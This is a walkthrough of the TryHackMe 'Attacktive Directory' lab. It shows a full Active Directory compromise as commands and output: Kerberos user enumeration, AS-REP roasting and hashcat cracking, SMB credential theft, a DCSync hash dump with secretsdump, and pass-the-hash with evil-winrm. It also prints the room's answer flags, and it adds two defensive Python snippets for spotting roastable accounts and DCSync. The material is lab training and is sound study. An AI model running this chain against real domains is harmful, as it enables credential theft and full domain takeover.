
[TryHackMe] Attacktive Directory: Walkthrough


Overview

This is a walkthrough of the TryHackMe room "Attacktive Directory".

Task3

Q1.What tool will allow us to enumerate port 139/445?

A.enum4linux

Q2.What is the NetBIOS-Domain Name of the machine?

Run a port scan.

$ nmap -Pn -T4 -sVC -A -p- 10.10.148.191 -oN nmap_result
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-01-21 07:29:11Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2025-01-20T07:02:52
|_Not valid after:  2025-07-22T07:02:52
|_ssl-date: 2025-01-21T07:30:12+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2025-01-21T07:30:03+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found

Now we know which ports are open.

Enumerate SMB.

$ enum4linux -a 10.10.148.191

 ================================( Getting domain SID for 10.10.148.191 )================================                                                                                                     
                                                                                                       
Domain Name: THM-AD                                                                                    
Domain Sid: S-1-5-21-3591857110-2884097990-301047963

We found the domain name.

A.THM-AD

Q3.What invalid TLD do people commonly use for their Active Directory Domain?

Hint.Spoiler: The full AD domain is spookysec.local

A..local

Task4

Q1.What command within Kerbrute will allow us to enumerate valid usernames?

Hint../kerbrute -h may help you

Download kerbrute.

$ wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64

Checking the help output, the userenum command enumerates usernames.

$ ./kerbrute_linux_amd64 -h    

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 01/21/25 - Ronnie Flathers @ropnop

This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.
It is designed to be used on an internal Windows domain with access to one of the Domain Controllers.
Warning: failed Kerberos Pre-Auth counts as a failed login and WILL lock out accounts

Usage:
  kerbrute [command]

Available Commands:
  bruteforce    Bruteforce username:password combos, from a file or stdin
  bruteuser     Bruteforce a single user's password from a wordlist
  help          Help about any command
  passwordspray Test a single password against a list of users
  userenum      Enumerate valid domain usernames via Kerberos
  version       Display version info and quit

Flags:
      --dc string       The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
      --delay int       Delay in millisecond between each attempt. Will always use single thread if set
  -d, --domain string   The full domain to use (e.g. contoso.com)
  -h, --help            help for kerbrute
  -o, --output string   File to write logs to. Optional.
      --safe            Safe mode. Will abort if any user comes back as locked out. Default: FALSE
  -t, --threads int     Threads to use (default 10)
  -v, --verbose         Log failures and errors

A.userenum

Q2.What notable account is discovered? (These should jump out at you)

Get the username list.

$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt

Also get the password list.

$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt

Enumerate usernames.

$ ./kerbrute_linux_amd64 userenum --dc 10.10.148.191 -d spookysec.local ./userlist.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 01/21/25 - Ronnie Flathers @ropnop

2025/01/21 03:09:27 >  Using KDC(s):
2025/01/21 03:09:27 >   10.10.148.191:88

2025/01/21 03:12:28 >  [+] VALID USERNAME:       james@spookysec.local
2025/01/21 03:12:32 >  [+] VALID USERNAME:       svc-admin@spookysec.local
2025/01/21 03:12:38 >  [+] VALID USERNAME:       James@spookysec.local
2025/01/21 03:12:40 >  [+] VALID USERNAME:       robin@spookysec.local
2025/01/21 03:13:01 >  [+] VALID USERNAME:       darkstar@spookysec.local
2025/01/21 03:13:16 >  [+] VALID USERNAME:       administrator@spookysec.local
2025/01/21 03:13:46 >  [+] VALID USERNAME:       backup@spookysec.local
2025/01/21 03:13:58 >  [+] VALID USERNAME:       paradox@spookysec.local
2025/01/21 03:15:16 >  [+] VALID USERNAME:       JAMES@spookysec.local
2025/01/21 03:15:42 >  [+] VALID USERNAME:       Robin@spookysec.local
2025/01/21 03:18:18 >  [+] VALID USERNAME:       Administrator@spookysec.local
2025/01/21 03:23:39 >  [+] VALID USERNAME:       Darkstar@spookysec.local
2025/01/21 03:25:19 >  [+] VALID USERNAME:       Paradox@spookysec.local
2025/01/21 03:31:02 >  [+] VALID USERNAME:       DARKSTAR@spookysec.local
2025/01/21 03:32:40 >  [+] VALID USERNAME:       ori@spookysec.local
2025/01/21 03:35:40 >  [+] VALID USERNAME:       ROBIN@spookysec.local
2025/01/21 03:43:07 >  Done! Tested 73317 usernames (16 valid) in 2020.169 seconds

Several accounts were enumerated.
Since the question hinted at an administrative account, I entered svc-admin and it was correct.

A.svc-admin

Q3.What is the other notable account is discovered? (These should jump out at you)

I guessed it from the number of characters in the answer.

A.backup

Task5

Q1.We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?

Trying with the svc-admin account returned a hash.

$ impacket-GetNPUsers -no-pass -dc-ip 10.10.58.169 spookysec.local/svc-admin
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Getting TGT for svc-admin
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:0403193fcd65c16c6718824d6792b464$06a375535fbebc0f40ebe8f58376afb8981aebff702b40e5a1c991db3147c72915c589cee112912d923eb5050c89e5c4fa7e8e512594d5052228f775741c64cc4a637de8e2261eb0b276a3845d4dac87b193174bb8e8cb0bfd577a178a77c6aa05bc0dae851d32836b10b29869d3a9e158f27ac0eb554b5f6ceaf96cecfafc78a65a8aa620b3160c831fb15ac66b007fbb2226fb3079a7f2a0b27330f287b2489f3fa0f81d31fed946dc39f48c631b3030154604848ac38d8022396c149ba8e35da2119ecb894aeb5bef663c038c6cb9ee763c20c58fc1aa212d0100f22dc02c46c8d4ef98b5c760afe3ebc23de808555111

A.svc-admin

Q2.Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)

Hint.https://hashcat.net/wiki/doku.php?id=example_hashes and searching for the first part will help!

The hash type was identified from the Hashcat example-hashes table.


A.Kerberos 5 AS-REP etype 23

Q3.What mode is the hash?

A.18200
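As an added example (not code from the walkthrough or from Impacket), the following Python takes apart the $krb5asrep$ line format shown above and checks which accounts are exposed to this attack. For etype 23 the first hex field is the 16-byte HMAC-MD5 checksum and the second is the RC4-encrypted enc-part of the AS-REP, which hashcat cracks as mode 18200; an account only hands this material out when Kerberos pre-authentication is disabled on it, i.e. when the userAccountControl flag UF_DONT_REQUIRE_PREAUTH (0x400000) is set. The sample hash and the account list are constructed (the user, realm and checksum field mirror the walkthrough's output, but the enc-part is made up and shortened).

```python
"""Parse an AS-REP roasting hash and list accounts with pre-authentication disabled.

Added example, not from the walkthrough. The hash and account list below are
constructed samples.
"""
import re

# hashcat mode per AS-REP etype recognised here; only etype 23 appears on the page.
ASREP_HASHCAT_MODE = {23: 18200}

# userAccountControl bit that disables Kerberos pre-authentication.
UF_DONT_REQUIRE_PREAUTH = 0x400000

ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<edata>[0-9a-fA-F]+)$"
)

# Constructed sample: same layout as the walkthrough's hash, with a short made-up enc-part.
SAMPLE_HASH = (
    "$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:"
    "0403193fcd65c16c6718824d6792b464$" + "a1b2c3d4" * 10
)

# Constructed (sAMAccountName, userAccountControl) pairs as an LDAP query would return them.
SAMPLE_ACCOUNTS = [
    # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQUIRE_PREAUTH
    ("svc-admin", 0x10200 | UF_DONT_REQUIRE_PREAUTH),
    ("backup", 0x10200),
    ("administrator", 0x10200),
]


def parse_asrep_hash(line):
    """Split a $krb5asrep$ line into its fields; raises ValueError on malformed input."""
    m = ASREP_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$ line")
    etype = int(m.group("etype"))
    edata = m.group("edata")
    if len(edata) % 2:
        raise ValueError("enc-part is not a whole number of bytes")
    return {
        "etype": etype,
        "user": m.group("user"),
        "realm": m.group("realm"),
        "checksum": m.group("checksum").lower(),
        "edata_bytes": len(edata) // 2,
        "hashcat_mode": ASREP_HASHCAT_MODE.get(etype),
    }


def is_asrep_roastable(user_account_control):
    """True when pre-authentication is disabled for the account."""
    return bool(user_account_control & UF_DONT_REQUIRE_PREAUTH)


def roastable_accounts(accounts):
    """Names of accounts whose userAccountControl has UF_DONT_REQUIRE_PREAUTH set."""
    return [name for name, uac in accounts if is_asrep_roastable(uac)]


if __name__ == "__main__":
    print(parse_asrep_hash(SAMPLE_HASH))
    print("pre-auth disabled:", roastable_accounts(SAMPLE_ACCOUNTS))
```

The fix for the exposed account is to clear that flag ("Do not require Kerberos preauthentication" in the account properties) or, where a legacy client truly needs it, to give the account a long random password so the offline guessing the next question performs does not succeed.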

Q4.Now crack the hash with the modified password list provided, what is the user accounts password?

Crack the obtained hash with Hashcat.

$ hashcat -a 0 -m 18200 svc-admin_hash passwordlist.txt
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:0403193fcd65c16c6718824d6792b464$06a375535fbebc0f40ebe8f58376afb8981aebff702b40e5a1c991db3147c72915c589cee112912d923eb5050c89e5c4fa7e8e512594d5052228f775741c64cc4a637de8e2261eb0b276a3845d4dac87b193174bb8e8cb0bfd577a178a77c6aa05bc0dae851d32836b10b29869d3a9e158f27ac0eb554b5f6ceaf96cecfafc78a65a8aa620b3160c831fb15ac66b007fbb2226fb3079a7f2a0b27330f287b2489f3fa0f81d31fed946dc39f48c631b3030154604848ac38d8022396c149ba8e35da2119ecb894aeb5bef663c038c6cb9ee763c20c58fc1aa212d0100f22dc02c46c8d4ef98b5c760afe3ebc23de808555111:management2005

A.management2005

Task6

Q1.What utility can we use to map remote SMB shares?

Hint.man smbclient will tell you a little bit about the tool!

A.smbclient

Q2.Which option will list shares?

Hint.man smbclient will tell you a little bit about the tool!

The -L option lists shares.

$ smbclient --help              
Usage: smbclient [OPTIONS] service <password>
  -L, --list=HOST                              Get a list of shares available on a host

A.-L

Q3.How many remote shares is the server listing?

Enumerate the SMB shares with the credentials obtained.

$ smbclient -L 10.10.58.169 -U svc-admin%management2005

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        backup          Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share

A.6

Q4.There is one particular share that we have access to that contains a text file. Which share is it?

We could connect to the backup share.

$ smbclient //10.10.58.169/backup -U svc-admin  
Password for [WORKGROUP\svc-admin]:
Try "help" to get a list of possible commands.
smb: \>

A.backup

Q5.What is the content of the file?

Hint.The encoded contents of the file

Listing the directory reveals a text file.

smb: \> dir
  .                                   D        0  Sat Apr  4 15:08:39 2020
  ..                                  D        0  Sat Apr  4 15:08:39 2020
  backup_credentials.txt              A       48  Sat Apr  4 15:08:53 2020

                8247551 blocks of size 4096. 3564988 blocks available

The file contains an encoded string.

YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

A.****

Q6.Decoding the contents of the file, what is the full contents?

Decoding it with base64 gives the plaintext.

$ echo "YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw" | base64 -d
backup@spookysec.local:backup2517860

A.backup@spookysec.local:backup2517860

Task7

Q1.What method allowed us to dump NTDS.DIT?

Hint.Read the secretsdump output!

Running impacket-secretsdump, the output shows that the DRSUAPI method is used.

$ impacket-secretsdump spookysec.local/backup:backup2517860@10.10.58.169
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets

A.DRSUAPI
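As an added example (not code from the walkthrough or from Impacket), the following Python shows how the DRSUAPI dump above can be spotted in the domain controller's logs. Replicating directory secrets requires the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All control-access rights; with "Audit Directory Service Access" enabled the DC records the call as Security Event ID 4662 naming those rights in the Properties field, and any subject other than a domain controller's machine account (or a known replication service account) exercising them deserves an alert. The event records below are constructed samples, the DC name is taken from the nmap output earlier on the page, and the non-replication GUID is an obvious placeholder.

```python
"""Flag DRSUAPI replication (DCSync-style NTDS extraction) in Event ID 4662.

Added example, not from the walkthrough. The event records are constructed.
"""
import re

# Control-access right GUIDs a replication caller needs.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

# 4662 AccessMask bit for "control access" (extended rights such as the two above).
ACCESS_CONTROL_ACCESS = 0x100

GUID_RE = re.compile(r"[0-9a-fA-F-]{36}")

# Constructed 4662 records: the DC's own machine account replicating (normal),
# a user account replicating (suspicious), and an unrelated read whose
# property GUID is a placeholder.
SAMPLE_4662 = [
    {"SubjectUserName": "ATTACKTIVEDIREC$", "AccessMask": 0x100,
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "backup", "AccessMask": 0x100,
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "svc-admin", "AccessMask": 0x10,
     "Properties": "{00000000-0000-0000-0000-000000000001}"},
]


def replication_rights(properties):
    """Replication-right GUIDs present in a 4662 Properties field."""
    return {g.lower() for g in GUID_RE.findall(properties)} & REPLICATION_RIGHTS


def find_dcsync(events, domain_controllers, allowlist=()):
    """Subjects that exercised replication rights without being a DC machine
    account or an allowlisted service account, in log order, deduplicated."""
    expected = {dc.upper() + "$" for dc in domain_controllers}
    expected |= {a.upper() for a in allowlist}
    hits = []
    for ev in events:
        if not ev["AccessMask"] & ACCESS_CONTROL_ACCESS:
            continue
        if not replication_rights(ev["Properties"]):
            continue
        subject = ev["SubjectUserName"]
        if subject.upper() in expected or subject in hits:
            continue
        hits.append(subject)
    return hits


if __name__ == "__main__":
    print("replication by non-DC subjects:",
          find_dcsync(SAMPLE_4662, domain_controllers=["ATTACKTIVEDIREC"]))
```

The allowlist exists because some legitimate software (directory synchronisation services, for example) replicates with a dedicated account; everything else that holds these rights on the domain object, like the backup account in this room, is a path to every password hash in the domain and should be reviewed.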

Q2.What is the Administrators NTLM hash?

We obtained the Administrator hash.

$ impacket-secretsdump spookysec.local/backup:backup2517860@10.10.58.169
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::

0e0363213e37b94221497260b0bcb4fc is the NTLM hash.

A.0e0363213e37b94221497260b0bcb4fc

Q3.What method of attack could allow us to authenticate as the user without the password?

A.Pass The Hash

Q4.Using a tool called Evil-WinRM what option will allow us to use a hash?

Hint.if Evil-WinRM is not installed, you can do so by issuing "gem install evil-winrm"

Checking the help, the option is -H.

$ evil-winrm --help          
                                        
Evil-WinRM shell v3.5

Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [--spn SPN_PREFIX] [-l]
    -S, --ssl                        Enable ssl
    -c, --pub-key PUBLIC_KEY_PATH    Local path to public key certificate
    -k, --priv-key PRIVATE_KEY_PATH  Local path to private key certificate
    -r, --realm DOMAIN               Kerberos auth, it has to be set also in /etc/krb5.conf file using this format -> CONTOSO.COM = { kdc = fooserver.contoso.com }
    -s, --scripts PS_SCRIPTS_PATH    Powershell scripts local path
        --spn SPN_PREFIX             SPN prefix for Kerberos auth (default HTTP)
    -e, --executables EXES_PATH      C# executables local path
    -i, --ip IP                      Remote host IP or hostname. FQDN for Kerberos auth (required)
    -U, --url URL                    Remote url endpoint (default /wsman)
    -u, --user USER                  Username (required if not using kerberos)
    -p, --password PASS              Password
    -H, --hash HASH                  NTHash
    -P, --port PORT                  Remote host port (default 5985)
    -V, --version                    Show version
    -n, --no-colors                  Disable colors
    -N, --no-rpath-completion        Disable remote path completion
    -l, --log                        Log the WinRM session
    -h, --help                       Display this help message

A.-H

Task8

Q1.svc-admin

Connect as Administrator using the hash.

$ evil-winrm -u Administrator -H 0e0363213e37b94221497260b0bcb4fc -i 10.10.58.169
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                       
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                                         
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

The flag was obtained from C:\Users\svc-admin\Desktop\user.txt.txt.

*Evil-WinRM* PS C:\Users\svc-admin> more Desktop\user.txt.txt
TryHackMe{K3rb3r0s_Pr3_4uth}

A.TryHackMe{K3rb3r0s_Pr3_4uth}

Q2.backup

The flag was obtained from C:\Users\backup\Desktop\PrivEsc.txt.

*Evil-WinRM* PS C:\Users> more backup\Desktop\PrivEsc.txt
TryHackMe{B4ckM3UpSc0tty!}

A.TryHackMe{B4ckM3UpSc0tty!}

Q3.Administrator

The flag was obtained from C:\Users\Administrator\Desktop\root.txt.

*Evil-WinRM* PS C:\Users> more Administrator\Desktop\root.txt
TryHackMe{4ctiveD1rectoryM4st3r}

A.TryHackMe{4ctiveD1rectoryM4st3r}
